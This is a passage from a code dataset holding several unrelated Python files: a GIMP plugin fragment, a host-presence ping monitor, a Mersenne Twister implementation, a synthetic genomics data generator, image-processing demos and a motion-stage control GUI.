1080),\n#\t\t(PF_INT, \"interpolationMode\", \"Interpolation mode (0,1,2, or 3)\", 3),\n#\t\t(PF_STRING, \"listFiles\", \"List of image files to operate on. The entries in the list should be separated by ':' characters.\", \"\")\n#\t],\n#\t[],\n#\tsuperimpose_image_over_another_noninteractive,\n#\tmenu=\"/File/Superimpose one image over another - Non-interactive\")\n\n\nclass SuperimposeImageObject :\n\n\tnameClass = \"SuperimposeImageObject\"\n\n\timage = None\n\tdrawable = None\n\n\thorizontalResolution = None\n\tverticalResolution = None\n\n\twidthImage_original = None\n\theightImage_original = None\n\n\tfilename\t\t = None\n\n\tresizeAmount = 1.0\n\n\tinterpolationMode = INTERPOLATION_NONE\n\n\n\tdef __init__(\n\n\t self,\n\t image,\n\t drawable,\n\t horizontalResolution,\n\t verticalResolution,\n\t interpolationMode,\n\t filename\n\t) :\n\n\t\tnameMethod = self.nameClass + \"::__init__\"\n\n\n\t\tprint(\"%s : Enter\" % (nameMethod))\n\n\t\tself.image = image\n\t\tself.drawable = drawable\n\n\t\tself.horizontalResolution = horizontalResolution\n\t\tself.verticalResolution = verticalResolution\n\n\t\tself.widthImage_original = image.width\n\t\tself.heightImage_original = image.height\n\n\t\tself.interpolationMode = interpolationMode\n\n\t\tself.filename\t\t = filename\n\n\t\tprint(\"%s : Exit\" % (nameMethod))\n\n\n\tdef run(self) :\n\n\n\t\tnameMethod = self.nameClass + \"::__init__\"\n\n\n\t\tprint(\"%s : Enter\" % (nameMethod))\n\t\t\n\t\tprint(\"%s : Exit\" % (nameMethod))\n\nmain()\n","sub_path":"python/list_superimposeImageOverAnother.py","file_name":"list_superimposeImageOverAnother.py","file_ext":"py","file_size_in_byte":12897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"24845330","text":"\nimport numpy as np\nfrom mp_cython import *\nfrom mp_python import *\nfrom mp_numba import *\n\ndata = np.random.random((101, 101))\ndiag = np.concatenate([np.diag(data, 1), [data[-1, 0]]])\n\ndeltas = [np.zeros((100, 100), dtype=np.float64) for _ in range(6)]\ntwoopt_matrix_python(data, diag, 100, deltas[0])\ntwoopt_matrix_cython(data, diag, 100, deltas[1])\ntwoopt_matrix_numba(data, diag, 100, deltas[2])\ntwoopt_matrix_outerparallelcython(data, diag, 100, deltas[3])\ntwoopt_matrix_innerparallelcython(data, diag, 100, deltas[4])\ntwoopt_matrix_allparallelcython(data, diag, 100, deltas[5])\n\nassert np.any(deltas[0] != 0)\nfor delta in deltas[1:]:\n assert np.all((delta - deltas[0] < 10 ** -10))\nprint('Matrix tested OK')\n\ndeltas = [np.zeros((100, 100), dtype=np.float64) for _ in range(6)]\ntwoopt_submatrix_python(data, diag, 0, 2, 98, 98, deltas[0])\ntwoopt_submatrix_cython(data, diag, 0, 2, 98, 98, deltas[1])\ntwoopt_submatrix_numba(data, diag, 0, 2, 98, 98, deltas[2])\ntwoopt_submatrix_outerparallelcython(data, diag, 0, 2, 98, 98, deltas[3])\ntwoopt_submatrix_innerparallelcython(data, diag, 0, 2, 98, 98, deltas[4])\ntwoopt_submatrix_allparallelcython(data, diag, 0, 2, 98, 98, deltas[5])\n\n\nassert np.any(deltas[0] != 0)\nfor delta in deltas[1:]:\n assert np.all((delta - deltas[0] < 10 ** -10))\nprint('Submatrix tested OK')\n","sub_path":"mp_cython/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"82623129","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#libraries imports\nimport os\nimport json\nimport sys\nimport socket\nimport argparse\nimport logging\nimport subprocess\n\n# DEFAULT VALUES 
####\n\n#Const for the default conf path\nDEFAULT_CONF_PATH = os.getenv(\"HOME\")+\"/.config/homy.conf\"\n\n#Default tmp path\ntmpPath = \"/tmp/homy.tmp\"\n\n#Default number of consecutive non-matching scans that need to be performed to change the host state\nchangeThreshold = 5\n\n#Default action when a host went \"away\" (nothing)\naAction = \"\"\n\n#Default action when a host came \"here\" (nothing)\nhAction = \"\"\n\n#default host array\nhosts = []\n\n#default host dict\ntmp = {}\n\n#####################\n\n# METHODS ###########\n\ndef initArgs():\n    \"Method used to define flags\"\n\n    #Initialisation of the argument parser\n    parser = argparse.ArgumentParser(description='Homy, Home presence fetcher')\n\n    #Argument used to specify the path to the configuration file if you don't want to use the default one\n    parser.add_argument(\"-c\", \"--config\", metavar=\"path\", type=str, help=\"Path to the configuration file (default is '$HOME/.config/homy.conf').\", required=False)\n    parser.add_argument(\"-v\", \"--verbose\", help=\"Enable verbose mode.\", action=\"store_true\", required=False)\n    parser.add_argument(\"-r\", \"--readable\", help=\"Output data in a human readable format.\", action=\"store_true\", required=False)\n    parser.add_argument(\"-a\", \"--absolute\", help=\"Output if the host is 'here' or 'away' but no temporary state ('arriving', 'leaving').\", action=\"store_true\", required=False)\n    parser.add_argument(\"-q\", \"--query\", help=\"Only query but don't trigger connection/disconnection actions.\", action=\"store_true\", required=False)\n\n    return vars(parser.parse_args())\n\ndef jsonLoader(path, fileRole, fileMode):\n    \"Method used to import and parse a json file\"\n\n    #Check if the file exists\n    try:\n        #Import json\n        with open(path, fileMode) as data:\n            return json.load(data)\n\n    #If not, inform the user and quit\n    except IOError:\n        log.critical(\"No \" + fileRole + \" file found. Exiting ...\")\n        sys.exit()\n    #If unreadable, inform the user and quit\n    except:\n        if not fileMode == \"a+\":\n            log.critical(\"Error reading the \" + fileRole + \" file, check your JSON syntax. 
Exiting ...\")\n            sys.exit()\n\ndef importTmp(path):\n    \"Method used to import the temporary file\"\n\n    global tmp\n\n    #Load the JSON file, create it if it does not exist\n    tmp = jsonLoader(path, \"temporary\", \"a+\")\n\n    #keep it a dict if the file is empty (just created)\n    if tmp is None:\n        tmp = {}\n\n    log.debug(\"Temporary file successfully loaded from \" + path)\n\ndef processData():\n    \"Method used to process the data from the scan and the tmp file\"\n\n    #Check each host/tmp matching entries and update their state\n    for host in hosts:\n        for key in tmp.keys():\n            if key == host['ip']:\n\n                log.debug(\"Checking \" + host['name'] + \" state\")\n\n                #If the host was here\n                if tmp[key]['state'] == \"here\":\n\n                    #and he's actually offline\n                    if host['state'] == \"offline\":\n                        tmp[key]['state'] = \"leaving\"\n                        tmp[key]['since'] = 0\n                    else:\n                        tmp[key]['since'] += 1\n\n                #If the host was leaving\n                elif tmp[key]['state'] == \"leaving\":\n\n                    #and he's still offline\n                    if host['state'] == \"offline\":\n                        if tmp[key]['since'] > changeThreshold:\n                            log.debug(host['name'] + \" just left\")\n                            tmp[key]['state'] = \"away\"\n                            tmp[key]['since'] += 1\n                            if not args['query']:\n                                triggerAction(host['aAction'])\n                        else:\n                            log.debug(host['name'] + \" is leaving\")\n                            tmp[key]['since'] += 1\n                    elif host['state'] == \"online\":\n                        tmp[key]['state'] = \"here\"\n                        tmp[key]['since'] = 0\n\n                #If the host was away\n                elif tmp[key]['state'] == \"away\":\n\n                    #and he's actually online\n                    if host['state'] == \"online\":\n                        tmp[key]['state'] = \"arriving\"\n                        tmp[key]['since'] = 0\n                    else:\n                        tmp[key]['since'] += 1\n\n                #If the host was arriving\n                else:\n\n                    #and he's actually here\n                    if host['state'] == \"online\":\n                        if tmp[key]['since'] >= changeThreshold:\n                            log.debug(host['name'] + \" just arrived\")\n                            tmp[key]['state'] = \"here\"\n                            tmp[key]['since'] += 1\n                            if not args['query']:\n                                triggerAction(host['hAction'])\n                        else:\n                            log.debug(host['name'] + \" is arriving\")\n                            tmp[key]['since'] += 1\n                    #if he went offline again, revert to away (mirrors the \"leaving\" branch above)\n                    elif host['state'] == \"offline\":\n                        tmp[key]['state'] = \"away\"\n                        tmp[key]['since'] = 0\n\ndef triggerAction(action):\n    \"Method used to execute actions if the host arrived or left\"\n\n    if action is not None:\n        subprocess.call(action, shell=True)\n        log.debug(\"Exec: \" + action)\n\ndef exportTmp(path):\n    \"Method used to export the current state to the tmp file\"\n\n    with open(path, 'w') as tmpFile:\n        json.dump(tmp, tmpFile)\n\n\ndef importConf(path):\n    \"Method used to import the configuration from a given path\"\n\n    global tmpPath, changeThreshold, hosts, aAction, hAction\n\n    #Load the json conf parsed in a list\n    conf = jsonLoader(path, \"configuration\", \"r\")\n\n    #Replace the value if it's defined in the conf list\n    if \"settings\" in conf:\n        if \"tmpPath\" in conf[\"settings\"]:\n            tmpPath=conf[\"settings\"][\"tmpPath\"]\n\n        if \"changeThreshold\" in conf[\"settings\"]:\n            changeThreshold=conf[\"settings\"][\"changeThreshold\"]\n\n    #Load the hosts from the conf file\n    if \"hosts\" in conf:\n        for host in conf[\"hosts\"]:\n\n            #if the name and the host ip are defined (min info)\n            if host[\"name\"] and host[\"ip\"]:\n                aAction = None\n                hAction = None\n\n                #optional parameters (look the keys up by name, not by the variables above)\n                if 'aAction' in host:\n                    aAction = host['aAction']\n                if 'hAction' in host:\n                    hAction = host['hAction']\n\n                hosts.append({'name': host[\"name\"], 'ip': host[\"ip\"], 'aAction': aAction, 'hAction': hAction})\n            else:\n                log.debug(\"A host has been ignored, name or ip is missing.\")\n    #If there are no hosts, inform the user then exit\n    else:\n        log.critical(\"No hosts in the configuration 
file. Nothing to do. Exiting ...\")\n        sys.exit()\n\ndef pingOs(ip):\n    \"Method used to do an ICMP ping check on a given ip\"\n\n    try:\n        #One single packet ping. If it takes more than 1 sec to respond, end the subprocess\n        #for a better execution time. (false positive is negated by the change threshold)\n        response = subprocess.check_output([\"ping\", \"-c\", \"1\", \"-w\", \"1\", ip])\n        return True\n    except:\n        return False\n\ndef checkHosts():\n    \"Method used to check the state of each host\"\n\n    global tmp\n\n    #For each host, try to do an OS ping (bound to linux atm) and set the host to offline/online\n    for host in hosts:\n        if pingOs(host[\"ip\"]):\n            host['state'] = \"online\"\n            #This instruction adds the host to the dictionary 'tmp' with these values. If it already exists, it does nothing.\n            tmp.setdefault(host['ip'],{\"state\": \"here\", \"since\": 0})\n        else:\n            host['state'] = \"offline\"\n            #Same as the setdefault call above\n            tmp.setdefault(host['ip'],{\"state\": \"away\", \"since\": 0})\n\ndef outputData():\n    \"Method used to output and format the data\"\n\n    #For each host\n    for host in hosts:\n        for key in tmp.keys():\n            if key == host['ip']:\n\n                if args['absolute']:\n                    if args['readable']:\n                        print(host['name'] + \"@\" + host['ip'] + \" is \" + absoluteState(tmp[key]['state']) + \" since \" + str(tmp[key]['since']) + \" check(s)\")\n                    else:\n                        print(host['name'] + \",\" + host['ip'] + \",\" + absoluteState(tmp[key]['state']) + \",\" + str(tmp[key]['since']))\n                else:\n                    if args['readable']:\n                        print(host['name'] + \"@\" + host['ip'] + \" is \" + tmp[key]['state'] + \" since \" + str(tmp[key]['since']) + \" check(s)\")\n                    else:\n                        print(host['name'] + \",\" + host['ip'] + \",\" + tmp[key]['state'] + \",\" + str(tmp[key]['since']))\n\ndef absoluteState(state):\n    \"Method used to return only 'here' or 'away' by converting 'leaving' and 'arriving'\"\n\n    if state == \"leaving\":\n        return \"here\"\n    elif state == \"arriving\":\n        return \"away\"\n    else:\n        return state\n\n\n# MAIN ##############\n\nif __name__ == \"__main__\":\n\n    #Initialize the arguments\n    args = initArgs()\n    #configure the logging\n    logging.basicConfig(format='%(message)s', level=logging.INFO)\n    log = logging.getLogger('log')\n\n    #if the -v flag is used, set the logging level to DEBUG\n    if args['verbose']:\n        log.setLevel(\"DEBUG\")\n\n    #if the -c flag is used, try to import the file at the given path\n    if args['config']:\n        importConf(args['config'])\n        log.debug(\"Custom configuration successfully loaded from \" + args['config'])\n    else:\n        importConf(DEFAULT_CONF_PATH)\n        log.debug(\"Default configuration successfully loaded from \" + DEFAULT_CONF_PATH)\n\n    #Import the temp file\n    importTmp(tmpPath)\n    #Check the current host state\n    checkHosts()\n    #Process the data based on the last checks\n    processData()\n    #Print the data on stdout\n    outputData()\n    #Export the new data to the tmp file\n    exportTmp(tmpPath)\n\n#####################\n","sub_path":"homy.py","file_name":"homy.py","file_ext":"py","file_size_in_byte":10271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"561993994","text":"from matplotlib import pyplot\n\ndef get_lowest_bits(n, number_of_bits):\n    mask = (1 << number_of_bits) - 1\n    return n & mask\n\nclass MTRand:\n    MASK32 = 0xffffffff\n    W = 32\n    N = 624\n    M = 397\n    R = 31\n    A = 0x9908B0DF\n    U = 11\n    D = 0xFFFFFFFF\n    S = 7\n    B = 0x9D2C5680\n    T = 15\n    C = 0xEFC60000\n    L = 18\n    F = 1812433253\n    LOWER_MASK = (1 << R) - 1\n    UPPER_MASK = (1 << R) # doesn't work unless W=32 and R=31\n    \n    def 
__init__(self, seed):\n        self.MT = [0] * self.N\n        self.index = self.N\n        self.MT[0] = seed & self.MASK32\n\n        for i in range(1, len(self.MT)):\n            # keep the low W=32 bits here, as in the reference MT19937 seeding\n            self.MT[i] = (self.F * (self.MT[i-1] ^ (self.MT[i-1] >> (self.W-2))) + i) & self.MASK32\n\n    def next(self):\n        if self.index >= self.N:\n            if self.index > self.N:\n                raise Exception(\"Generator was never seeded\")\n            self.twist()\n        \n        y = self.MT[self.index]\n        y = y ^ ((y >> self.U) & self.D)\n        y = y ^ ((y << self.S) & self.B)\n        y = y ^ ((y << self.T) & self.C)\n        y = y ^ (y >> self.L)\n\n        self.index += 1\n        return y #& self.LOWER_MASK\n\n    def twist(self):\n        for i in range(self.N):\n            x = ( self.MT[i] & self.UPPER_MASK ) + ( self.MT[(i+1) % self.N] & self.LOWER_MASK )\n            xA = x >> 1\n            if x % 2:\n                xA = xA ^ self.A\n            self.MT[i] = self.MT[(i+self.M) % self.N] ^ xA\n        self.index = 0 \n\nif __name__ == '__main__':\n    r = MTRand(3423453245)\n\n    data = [r.next() for i in range(5000)]\n    pyplot.hist(data)\n    pyplot.show()\n\n    \n","sub_path":"python/project/challenge21.py","file_name":"challenge21.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"69181660","text":"### DATASET GENERATION MODULE: Synthetic Genomic Seq Dataset ##\nimport pandas as pd\nimport numpy as np\n\ndef random_data(size, ratio):\n    # Creates a random dataset filled with random integers 0, 1 or 2\n    dataset = pd.DataFrame(np.random.randint(0, 3, size=size))\n    # Creates and assigns random labels to each sample of the random dataset\n    #labels = np.random.randint(0, 2, size[0])\n    labels = generateLabels(size[0], ratio)\n    return dataset, labels\n\n# Helper function that checks if the spike has already been chosen\ndef alreadySpiked(index, spikeIndexes):\n    for spike in spikeIndexes:\n        if spike == index:\n            return True\n\ndef generate_spike_indexes(features, number_of_spikes, betaglobin, spike_array):\n    index = np.random.randint(0, features)\n    if(len(spike_array) >= number_of_spikes):\n        return spike_array\n    else:\n        if(index == betaglobin):\n            return generate_spike_indexes(features, number_of_spikes, betaglobin, spike_array)\n        elif(alreadySpiked(index, spike_array)):\n            return generate_spike_indexes(features, number_of_spikes, betaglobin, spike_array)\n        else:\n            spike_array.append(index)\n            return generate_spike_indexes(features, number_of_spikes, betaglobin, spike_array)\n\ndef createDataset(sampleNumber, featureNumber, balanceRatio, numberOfSpikes, betaglobinIndex, spikedArray, spikeIndexes):\n    # Creates a Pandas Dataframe with shape: (# of samples, # of features) filled with random integers between {0, 1, 2}\n    dataset = pd.DataFrame(np.random.randint(0, 3, size=(sampleNumber, featureNumber)))\n    # Creates a list of length (# of samples) filled with the value 2 (This is supposed to represent HbS)\n    betaglobin = [2] * sampleNumber\n    # List of \"spikes\" / enriched alleles\n    if len(spikedArray) == 0:\n        spikedArray = generateSpikes(sampleNumber, balanceRatio, numberOfSpikes)\n        # Assigned label for each sample in a list\n        labels = generateLabels(sampleNumber, balanceRatio)\n        # \"Injects\" or inserts the list of spikes to the dataset\n        dataset, spikeIndexes = insertSpike(dataset, spikedArray, betaglobin, featureNumber, betaglobinIndex, [])\n    else:\n        # Assigned label for each sample in a list\n        labels = generateLabels(sampleNumber, balanceRatio)\n        dataset, spikeIndexes = insertSpike(dataset, spikedArray, betaglobin, featureNumber, betaglobinIndex, spikeIndexes)\n    return dataset, labels, spikeIndexes, 
spikedArray\n\ndef generateSpikes(sampleNumber, balanceRatio, numberOfSpikes):\n spikedArray = [] # Initializes empty list (List of spikes)\n variants = [0, 1, 2] # Possible variants represented as counts: ()\n # Probabilities for each of the possible variants to occur based on the corresponding label, in order (0, 1, 2)\n probabilitiesControl = [0.70, 0.15, 0.15]\n probabilitiesDisease = [0.15, 0.15, 0.70]\n # Repeats for the number of spikes desired\n for i in range(0, numberOfSpikes):\n spikedFeature = [] # Empty list (Spiked allele)\n for i in range (0, sampleNumber):\n # If the index is below the cut off sample based on the balance ratio then the sample is in the control cohort, else is in the disease cohort\n if i < sampleNumber * balanceRatio:\n # Inserts the value based on the probabilities above (for Control label)\n spikedFeature.append(np.random.choice(variants, p=probabilitiesControl))\n else:\n # Inserts the value based on the probabilities above (for Disease label)\n spikedFeature.append(np.random.choice(variants, p=probabilitiesDisease))\n # Adds spikes allele to the list\n spikedArray.append(spikedFeature)\n return spikedArray\n\ndef generateLabels(sampleNumber, balanceRatio):\n labels = [] # Empty list\n classes = [0, 1]\n probabilities = [1 - balanceRatio, balanceRatio]\n # Iterates through number of samples\n for i in range (0, sampleNumber):\n # If the index is below the cut off sample based on the balance ratio then the sample is in the control cohort, else is in the disease cohort\n if i < sampleNumber * balanceRatio:\n # Control cohort (0)\n labels.append(0)\n else:\n # Disease cohort (1)\n labels.append(1)\n return labels\n\n##### Need to add a way to handle if the spike index has already been used (Possible recursive function? 
pop from spiked array?)\ndef insertSpike(dataset, spikedArray, betaglobin, featureNumber, betaglobinIndex, spikeIndexes):\n    dataset[betaglobinIndex] = betaglobin # adds the betaglobin Series to the dataset\n    if(len(spikeIndexes) > 0):\n        for i in range(0, len(spikeIndexes)):\n            dataset[spikeIndexes[i]] = spikedArray[i]\n    else:\n        for spike in spikedArray:\n            # Selects a random index\n            spikeIndex = np.random.randint(0, featureNumber)\n            # If the index is not already used by another spike, or the betaglobin index, then proceed\n            if spikeIndex != betaglobinIndex and not alreadySpiked(spikeIndex, spikeIndexes):\n                # Adds spike to dataset\n                dataset[spikeIndex] = spike\n                # Adds index to the tracking array\n                spikeIndexes.append(spikeIndex)\n    return dataset, spikeIndexes\n\ndef create_dataset(samples, features, balance, spikes, betaglobin):\n    # Dataframe filled with 0s\n    dataset = pd.DataFrame(np.zeros((samples, features)))\n    # Fill in each sample\n    #dataset = dataset.astype('int32')\n\n    betaglobin_array = [2.0] * samples\n    dataset[betaglobin] = betaglobin_array\n\n    variants = [0, 1, 2] # Possible variants represented as counts: ()\n    # Probabilities for each of the possible variants to occur based on the corresponding label, in order (0, 1, 2)\n    probabilitiesControl = [0.70, 0.15, 0.15]\n    probabilitiesDisease = [0.15, 0.15, 0.70]\n\n    labels = generateLabels(samples, balance)\n\n    spike_indexes = generate_spike_indexes(features, spikes, betaglobin, [])\n\n    for sample_index, sample in dataset.iterrows():\n        print(sample_index)\n        for column in dataset.columns:\n            if(column == betaglobin):\n                continue\n            elif(alreadySpiked(column, spike_indexes)):\n                if(labels[sample_index] == 1):\n                    dataset.at[sample_index, column] = np.random.choice(variants, p=probabilitiesDisease)\n                elif(labels[sample_index] == 0):\n                    dataset.at[sample_index, column] = np.random.choice(variants, p=probabilitiesControl)\n            else:\n                dataset.at[sample_index, column] = np.random.randint(0, 3)\n\n    return dataset, labels, spike_indexes\n","sub_path":"data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":6727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"261154192","text":"# coding: utf-8\n# python3.5.3\n# draw_image.py\n# ------------------------------------------------------------------------\n# purpose:\n# Slices the image file selected in MyStudio level 1 into pieces and implements controls for adjusting the pieces.\n# A headless utility feature, with no screen of its own.\n\n\nimport cv2\nimport matplotlib.pyplot as plt\n\nfrom skimage import data, io, segmentation, color, measure, filters\nfrom skimage.color import rgb2gray\nfrom skimage.color.adapt_rgb import adapt_rgb, each_channel, hsv_value\nfrom skimage.exposure import rescale_intensity\nfrom argparse import ArgumentParser\n\nparser = ArgumentParser()\nparser.add_argument(\"--content\", type=str)\nparser.add_argument('--output', type=str)\nparser.add_argument('--KERNEL_SIZE', type=float)\nparser.add_argument('--COLOR_TYPE', type=int)\nparser.add_argument('--THREASH', type=int)\nparser.add_argument('--BLURRED', type=int)\nparser.add_argument('--cuda', type=int)\nargs = parser.parse_args()\n\n@adapt_rgb(each_channel)\ndef sobel_each(image):\n    return filters.sobel(image)\n\n\n@adapt_rgb(hsv_value)\ndef sobel_hsv(image):\n    return filters.sobel(image)\n\n\ndef as_gray(image_filter, image, *args, **kwargs):\n    gray_image = rgb2gray(image)\n    return image_filter(gray_image, *args, **kwargs)\n\n\n@adapt_rgb(as_gray)\ndef sobel_gray(image):\n    return filters.sobel(image)\n\n# 
====================================\n# read Image \n# ====================================\n# For Reading : No Blurred, Just Image\nimg_origin = data.imread(args.content)\n# For Sketch Mode\nimg = cv2.medianBlur(img_origin, args.BLURRED) # Blurred Image\n\nresult = []\n\n# ====================================\n# Convert to a sketch image file\n# ====================================\nfig = plt.figure()\nax = fig.add_subplot(111)\n\nplt.xticks([])\nplt.yticks([])\n\nax.imshow(rescale_intensity(1 - sobel_gray(img)), cmap=plt.cm.gray)\nbbox = ax.get_tightbbox(fig.canvas.get_renderer())\nfig.savefig(\"Data/temp_draw.png\",\n            bbox_inches=bbox.transformed(fig.dpi_scale_trans.inverted())) ","sub_path":"Programs/draw_image.py","file_name":"draw_image.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"389194963","text":"# https://leetcode.com/problems/longest-palindromic-substring/description/\n\n\nclass Solution:\n\n    @staticmethod\n    def expandPalindrome(s, i, j):\n        r = 0\n        while i-r >= 0 and j+r < len(s) and s[i-r] == s[j+r]:\n            r += 1\n        return (j+r) - (i-r) - 1\n\n    def longestPalindrome(self, s):\n        \"\"\"\n        :type s: str\n        :rtype: str\n        \"\"\"\n\n        \"\"\"\n        |<----length---->| (odd length)\n        s                e\n\n        |<----length---->| (even length)\n        s       i'       e\n\n        length = e - s + 1\n        i = (e + s) // 2 <= (e + s) / 2\n        -> e + s >= 2i\n\n        -> e >= i + (length - 1)/2\n           s >= i - (length - 1)/2\n\n        About e:\n            x/2 >= x//2 >= (x-1)/2\n            -> i + x//2 >= i + (x-1)/2\n            -> e = i + length//2\n\n        About s:\n            (x-1)/2 >= (x-1)//2 >= (x-2)/2\n            -> i - (x-1)//2 >= i - (x-1)/2\n            -> s = i - (length-1)//2\n        \"\"\"\n\n        length = len(s)\n        start = end = 0\n        for i in range(length):\n            len1 = self.expandPalindrome(s, i, i)\n            len2 = self.expandPalindrome(s, i, i+1)\n            length = max(len1, len2)\n            if length > end - start:\n                start = i - (length-1)//2\n                end = i + length//2\n        return s[start:end+1]\n","sub_path":"_PYTHON_/_problems_/_LC_/algorithms/longest_palindromic_substring.py","file_name":"longest_palindromic_substring.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"460357217","text":"import cv2\r\n'''OpenCV is a cross-platform library using which we can develop real-time computer\r\n vision applications. It mainly focuses on image processing, video capture and 
It mainly focuses on image processing, video capture and \r\n analysis including features like face detection and object detection.'''\r\n\r\nimport numpy as np\r\n'''Numpy provides a high-performance multidimensional array and basic \r\ntools to compute with and manipulate these arrays.'''\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\ndef canny(image):\r\n gray = cv2.cvtColor(lane_image, cv2.COLOR_BGR2GRAY) # Get the gray image\r\n blur = cv2.GaussianBlur(gray, (5, 5), 0) # Smooth the image; reduce the noise ;(5,5) kernel size\r\n canny = cv2.Canny(blur, 50, 150) # threshold\r\n return canny, blur, gray\r\n\r\nimage = cv2.imread('D:\\jinna\\Python\\source/test_image.jpg')\r\nlane_image = np.copy(image) # Protect the original image\r\ncanny, blur, gray= canny(lane_image)\r\n\r\ncv2.imshow('3_canny', canny)\r\ncv2.imshow('2_blur', blur)\r\ncv2.imshow('1_gray', gray)\r\ncv2.imshow('0_original_image', image) # The image is shown by imshow\r\ncv2.waitKey(0) #The image keep showing until the keyboard is pressed","sub_path":"Lane_Line_detection/Lin_1_canny.py","file_name":"Lin_1_canny.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"20282557","text":"\nimport subprocess \nimport os\nimport shutil \n\nTS_BASE = \"./@types/ol/\"\n\nfw = os.walk(TS_BASE)\n\nwhile True: \n try:\n curr_dir_info = next(fw)\n for _file in curr_dir_info[2]:\n if _file.endswith(\".d.ts\"):\n continue\n if _file.endswith(\".ts\"):\n ts_path = os.path.join(curr_dir_info[0], _file)\n declaration_path = ts_path.replace(\".ts\", \".d.ts\")\n if not os.path.exists(declaration_path):\n subprocess.call([\"npx\", \"tsc\", \"-d\", ts_path])\n except StopIteration:\n break","sub_path":"compile-declaration-files.py","file_name":"compile-declaration-files.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"500193401","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 8 16:38:38 2018\n\n@author: Mikroskop\n\"\"\"\n\nimport sys\nfrom PyQt5 import QtGui, uic\nimport PyQt5\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QMessageBox\n\n#import pyqtgraph as pg\nimport numpy as np\n#from pyqtgraph.Qt import QtGui, QtCore\n#import pandas as pd\n#import os\n#import Methods\n#from datetime import datetime\n#import pyqtgraph.exporters as exporters\n#import serial\n#from nidaqmx.constants import AcquisitionType, TaskMode, Slope,DigitalWidthUnits\n#import pprint\n#from pickle import dumps\n#from weakref import WeakKeyDictionary\nfrom XPS_ import XPS\n#import math \n\nclass StageCommunication():\n \n \n def __init__(self):\n\n # Instantiate the class\n \n test=2\n\n def connectStage(self):\n \n self.myxps = XPS()\n self.socketId = self.myxps.TCP_ConnectToServer(b'192.168.255.252', 5001, 20) # Connect to the XPS\n XPS.TCP_ConnectToServer\n if (self.socketId == -1): # Check connection passed\n print('Connection to XPS failed, check IP & Port')\n sys.exit()\n self.groupname = 'GROUP3'\n self.positionername = '.POSITIONER'\n self.group = self.groupname.encode(encoding='utf-8')\n self.positioner = self.group + self.positionername.encode()\n self.myxps.GroupKill(self.socketId, self.group) # Kill the group\n self.myxps.GroupInitialize(self.socketId, self.group) # Initialize the group \n self.myxps.GroupJogParametersSet(self.socketId, self.group, '20', '20')\n [errorCode, returnString] = self.myxps.GroupHomeSearch(self.socketId, self.group)\n 
\n \n # self.myxps.GroupKill(self.socketId, self.group) # Kill the group\n # self.myxps.GroupInitialize(self.socketId,self.group) # Initialize the group \n\n def setStageParams(self):\n\n # read Parameters from GUI or from File\n self.myxps.GroupJogParametersSet(self.socketId, self.group, '20', '20')\n\n def getCurrPos(self):\n [errorCode, self.currentPosition] = self.myxps.GroupPositionCurrentGet(self.socketId, self.positioner, 1)\n #Position=self.currentPosition\n #print('Positioner ' + self.positioner.decode() + ' is in mm position ' + str(self.currentPosition))\n \n #self.CalculateParameters_LightWay(Position)\n #print('Positioner ' + self.positioner.decode() + ' is in ps position ' + str(Pos_ps))\n\n def moveStageRel(self, RelativeMoveX):\n [errorCode, currentPosition] = self.myxps.GroupPositionCurrentGet(self.socketId, self.positioner, 1)\n print('Current Pos: ',currentPosition)\n print('Relative move mm: ', RelativeMoveX)\n self.myxps.GroupMoveRelative(self.socketId, self.positioner, [(float(RelativeMoveX))])\n \n # print ('Positioner ' + positioner.decode() + ' is in position ' +str(currentPosition))\n \n def moveStageAbs(self, AbsoluteMoveX):\n [errorCode, currentPosition] = self.myxps.GroupPositionCurrentGet(self.socketId, self.positioner, 1)\n print('Current Pos: ',currentPosition)\n print('Relative move mm: ', AbsoluteMoveX)\n self.myxps.GroupMoveAbsolute(self.socketId, self.positioner, [(float(AbsoluteMoveX))])\n \n # print ('Positioner ' + positioner.decode() + ' is in position ' +str(currentPosition))\n\n\n def closeStage(self):\n\n self.myxps.TCP_CloseSocket(self.socketId)\n # Close connection\n \n''' \n def CalculateParameters_StageMove(self):\n \n for key, value in StageParams_ps.items():\n mm_value=(value*3/10)/2\n StageParams_mm[key]=mm_value\n \n self.Num=(StageParams_ps['EndPoint']-StageParams_ps['StartPoint'])/StageParams_ps['StepWidth'] \n\n StageParams_mm['StartPoint']=StageParams_mm['StartPoint']-Offset_mm\n StageParams_mm['EndPoint']=StageParams_mm['EndPoint']-Offset_mm\n \n \n print('Number of Steps: ', self.Num)\n \n def CalculateParameters_LightWay(self, Position):\n Offset_ps=(Offset_mm*10/3)*2\n Position_ps=(Position*10/3)*2+Offset_ps\n \n \n return Position_ps\n''' \n\nclass MyWindow(QMainWindow):\n \n def __init__(self, parent=None): \n super(MyWindow, self).__init__(parent)\n \n self.ui=uic.loadUi('MovingStage.ui', self)\n self.show()\n \n self.Button_GoX_abs.clicked.connect(self.MoveStageAbs)\n self.Button_GoX_rel.clicked.connect(self.MoveStageRel)\n self.input_SetRelPositionX.returnPressed.connect(self.MoveStageRel)\n self.input_SetAbsPositionX.returnPressed.connect(self.MoveStageAbs)\n self.Button_Close.clicked.connect(self.close)\n self.Stage=StageCommunication()\n self.Stage.connectStage()\n self.Stage.setStageParams()\n #self.Stage.CalculateParameters_StageMove()\n 